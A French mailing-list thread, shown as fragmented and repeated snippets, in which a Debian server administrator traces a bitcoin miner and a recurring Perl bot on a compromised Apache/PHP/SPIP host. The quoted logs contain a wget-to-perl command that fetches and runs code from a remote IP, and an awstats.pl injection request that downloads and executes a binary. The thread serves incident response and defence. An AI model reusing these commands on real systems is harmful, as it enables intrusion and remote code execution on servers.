Le mardi 27 juin 2023 à 22:30:04 UTC+2, Erwann Le Bras a écrit :
> Je ne l'aurais pas cru...
> Le 27/06/2023 à 16:40, BERTRAND Joël a écrit :
> BERTRAND Joël a écrit :
> OK, je l'ai.
>
> 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
> /dev/shm;wget -O -
Je ne l'aurais pas cru...
Le 27/06/2023 à 16:40, BERTRAND Joël a écrit :
BERTRAND Joël a écrit :
OK, je l'ai.
2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
/dev/shm;wget -O -http://68.235.39.225/sepax|perl
2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]:
BERTRAND Joël a écrit :
> BERTRAND Joël a écrit :
>> OK, je l'ai.
>>
>> 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
>> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
>> 2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd
>> /dev/shm;wget -O -
BERTRAND Joël a écrit :
> OK, je l'ai.
>
> 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
> 2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd
> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
>
>
Le mardi 27 juin 2023 à 12:50:05 UTC+2, Michel Verdier a écrit :
> Le 27 juin 2023 BERTRAND Joël a écrit :
>
> > OK, je l'ai.
> >
> > 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
> > /dev/shm;wget -O - http://68.235.39.225/sepax|perl
> >
Le 27 juin 2023 BERTRAND Joël a écrit :
> OK, je l'ai.
>
> 2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
> /dev/shm;wget -O - http://68.235.39.225/sepax|perl
> 2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd
> /dev/shm;wget -O -
OK, je l'ai.
2023-06-27T09:12:18.564606+02:00 rayleigh www-data[10579]: shell -c cd
/dev/shm;wget -O - http://68.235.39.225/sepax|perl
2023-06-27T09:12:21.381703+02:00 rayleigh www-data[10583]: shell -c cd
/dev/shm;wget -O - http://68.235.39.225/sepax|perl
J'ai le script perl (mais vous pouvez
Le vendredi 23 juin 2023 à 10:10:04 UTC+2, BERTRAND Joël a écrit :
> Bonjour à tous,
>
> Je reviens au sujet de ma machine vérolée. J'ai un peu avancé sur le
> sujet. J'ai trouvé la porte d'entrée et corrigé.
>
> Le processus hwm est un mineur de bitcoin. Celui-ci a été
Michel Verdier a écrit :
> Le 25 juin 2023 BERTRAND Joël a écrit :
>
>> Petite remarque : j'ai modifié allow_url_fopen de on à off dans le
>> fichier de configuration de php 8.2 (je ne vois pas pourquoi c'est 'on'
>> par défaut). /tmp est maintenant en noexec.
>
> Attention de mémoire il y
On 6/26/23 14:01, Michel Verdier wrote:
Le 26 juin 2023 Erwann Le Bras a écrit :
-SPIP est basé sur PHP ; je ne pense pas que le système SPIP lui-même serait
touché (pas assez populaire) , mais les lancement de PHP?
Au contraire SPIP a eu son lot de failles, il vaut mieux avoir la
dernière
Le 25 juin 2023 BERTRAND Joël a écrit :
> Petite remarque : j'ai modifié allow_url_fopen de on à off dans le
> fichier de configuration de php 8.2 (je ne vois pas pourquoi c'est 'on'
> par défaut). /tmp est maintenant en noexec.
Attention de mémoire il y a plusieurs php.ini utilisés selon
Le 26 juin 2023 Jean-Michel OLTRA a écrit :
> Il y a longtemps, j'avais eu un problème de ce genre, et je l'avais trouvé
> en croisant (je crois que ça a déjà été suggéré) les horaires de lancement
> avec l'exécution de certaines pages php.
Oui c'est ce que je conseillais de faire
> Peut-être
Le 26 juin 2023 Erwann Le Bras a écrit :
> -SPIP est basé sur PHP ; je ne pense pas que le système SPIP lui-même serait
> touché (pas assez populaire) , mais les lancement de PHP?
Au contraire SPIP a eu son lot de failles, il vaut mieux avoir la
dernière version.
BERTRAND Joël a écrit :
> #!/bin/bash
>
> if [ $1 == "/usr/bin/rlog" ]; then exit 0; fi
> if [ $1 == "/usr/bin/rcsdiff" ]; then exit 0; fi
> logger -i "shell $*"
> for i in $(pstree -p); do logger -i $i; done
>
> exec $*
Ce script ne fonctionne pas correctement. J'ai essayé ceci, mais
Erwann Le Bras a écrit :
> bonjour
Bonjour,
> plusieurs pistes :
>
> - un truc qui se lance au démarrage de la machine et reste bien planqué
> qui lance la saleté de temps en temps) ?
> Je pense par exemple, s'il a exploité une faille de Apache à la base, a
> pu modifié la config pour
NoSpam a écrit :
> Bonjour
>
> rkhunter et chkrootkit ne détectent rien ?
chkrootkit ne couine pas (il tourne depuis des années dans un cron).
rkhunter que j'ai lancé hier non plus.
Bonjour
rkhunter et chkrootkit ne détectent rien ?
Le 26/06/2023 à 11:26, Jean-Michel OLTRA a écrit :
Bonjour,
Le lundi 26 juin 2023, BERTRAND Joël a écrit...
Est-ce que vous voyez plus efficace ? Le vers en question lance d'abord
un script sh qui daemonise un exécutable
Bonjour,
Le lundi 26 juin 2023, BERTRAND Joël a écrit...
> Est-ce que vous voyez plus efficace ? Le vers en question lance d'abord
> un script sh qui daemonise un exécutable perl. Je cherche à savoir qui
> lance cette saleté (sans doute www-data) mais surtout quel est
>
bonjour
plusieurs pistes :
- un truc qui se lance au démarrage de la machine et reste bien planqué
qui lance la saleté de temps en temps) ?
Je pense par exemple, s'il a exploité une faille de Apache à la base, a
pu modifié la config pour se lancer? Ou au boot de la machine
(systemctl) si les
Sébastien Dinot a écrit :
> BERTRAND Joël a écrit :
>> Porte d'entrée trouvée :
>
> Merci pour ce retour, toujours intéressant à avoir.
Porte d'entrée trouvée, mais il reste des scories. Je suis en train de
logguer ce que fait sh pour savoir quel est le processus qui me
réinstalle le
Le 2023-06-26 10:35, Erwann Le Bras a écrit :
merci du retour d'expérience, c'est intéressant.
D'où l'importance des patchs de sécurité à passer le plus tôt possible.
Cette expérience, qui date de 2004, m'a servi de leçon. Depuis, la
plupart des serveurs que j'administre sont mis à jour
merci du retour d'expérience, c'est intéressant.
D'où l'importance des patchs de sécurité à passer le plus tôt possible.
Erwann
Le 23/06/2023 à 11:35, Sébastien Dinot a écrit :
je devais compiler moi-même le noyau au lieu d'utiliser celui fourni
par Debian, chose que je faisais rarement par
BERTRAND Joël a écrit :
> Porte d'entrée trouvée :
Merci pour ce retour, toujours intéressant à avoir.
Sébastien
--
Sébastien Dinot, sebastien.di...@free.fr
http://www.palabritudes.net/
Ne goutez pas au logiciel libre, vous ne pourriez plus vous en passer !
Porte d'entrée trouvée :
GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20131%2e220%2e92%2e80%2fcacat%3bchmod%20%2bx%20cacat%3b%2e%2fcacat%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1\n"
"GET
Quelques nouvelles.
Le bot en question est une version moderne d'un vieux truc (on en
trouve des traces depuis 2003) :
https://www.politoinc.com/post/2015/04/01/analysis-of-a-romanian-botnet
https://forum.directadmin.com/threads/cannot-restart-apache.17795/
Le 2023-06-23 10:30, BERTRAND Joël a écrit :
Très bien. Et quelle est la marche à suivre. Je peux démarrer sur un
liveCD ou autre chose, mais je ne suis pas au fait de ce qu'il faut
faire après cela.
La question est vague, il faut monter les partitions du système, puis y
rechercher ce qu'il y
Le 23 juin 2023 BERTRAND Joël a écrit :
> Sur cette machine, les seules choses tournant avec les droits www-data
> sont :
> - un serveur apache2 (debian/testing)
> - php 8.2 (et 7.4 pour un blog b2 evolution)
> - trois sites SPIP (4.1.10 à jour, y compris les plugins)
Et d'ailleurs si tu
Le 23 juin 2023 BERTRAND Joël a écrit :
> Sur cette machine, les seules choses tournant avec les droits www-data
> sont :
> - un serveur apache2 (debian/testing)
> - php 8.2 (et 7.4 pour un blog b2 evolution)
> - trois sites SPIP (4.1.10 à jour, y compris les plugins)
Il y a possibilité
On 6/23/23 10:30, BERTRAND Joël wrote:
Sébastien Dinot a écrit :
Le 2023-06-23 10:08, BERTRAND Joël a écrit :
Ma question est donc assez simple ;-) Comment trouver par quoi sont
lancés ces deux processus ?
En pareille circonstance, il n'y a qu'une seule solution : analyse du
disque depuis
Sébastien Dinot a écrit :
> Le 2023-06-23 10:08, BERTRAND Joël a écrit :
>> Ma question est donc assez simple ;-) Comment trouver par quoi sont
>> lancés ces deux processus ?
>
> En pareille circonstance, il n'y a qu'une seule solution : analyse du
> disque depuis un système live sur clé USB.
>
Le 2023-06-23 10:08, BERTRAND Joël a écrit :
Ma question est donc assez simple ;-) Comment trouver par quoi sont
lancés ces deux processus ?
En pareille circonstance, il n'y a qu'une seule solution : analyse du
disque depuis un système live sur clé USB.
En effet, si un rootkit a été
Bonjour à tous,
Je reviens au sujet de ma machine vérolée. J'ai un peu avancé sur le
sujet. J'ai trouvé la porte d'entrée et corrigé.
Le processus hwm est un mineur de bitcoin. Celui-ci a été éradiqué et
ne revient plus m'embêter.
À intervalle régulier (ce matin
32 matches
Mail list logo
